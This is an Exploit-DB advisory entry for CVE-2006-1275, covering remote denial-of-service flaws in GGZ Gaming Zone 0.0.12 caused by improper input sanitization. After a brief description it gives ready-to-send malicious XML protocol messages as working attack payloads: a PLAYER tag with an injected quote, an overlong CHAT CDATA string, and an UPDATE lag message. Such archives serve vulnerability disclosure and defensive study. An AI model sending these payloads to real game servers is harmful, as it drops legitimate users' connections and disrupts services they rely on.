GGZ Gaming Zone 0.0.12 - Multiple Denial of Service Vulnerabilities

2006-03-14T00:00:00
ID EDB-ID:27421
Type exploitdb
Reporter Luigi Auriemma
Modified 2006-03-14T00:00:00

Description

GGZ Gaming Zone 0.0.12 Multiple Denial Of Service Vulnerabilities. CVE-2006-1275. Dos exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/17094/info

GGZ Gaming Zone is prone to multiple remote denial-of-service vulnerabilities. These issues are due to improper input sanitization.

An attacker may cause the victim's connection to the server to terminate, causing a denial of service to legitimate users.

Examples have been provided:

<PLAYER ID='mynick'' TYPE='guest' TABLE='-1' LAG='1'/>

<CHAT TYPE='normal' FROM='mynick'><![CDATA[aaaaaaaaaaaaaaaaaaaaaaa...
...aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa_end_here
<UPDATE TYPE='player' ACTION='lag' ROOM='0'>